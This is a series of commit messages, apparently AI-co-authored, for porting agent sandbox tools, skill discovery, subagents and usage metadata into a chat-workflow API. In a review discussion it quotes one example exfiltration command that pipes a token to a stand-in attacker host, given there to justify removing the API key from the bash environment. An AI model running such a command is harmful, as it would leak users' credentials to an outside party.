- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 22, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
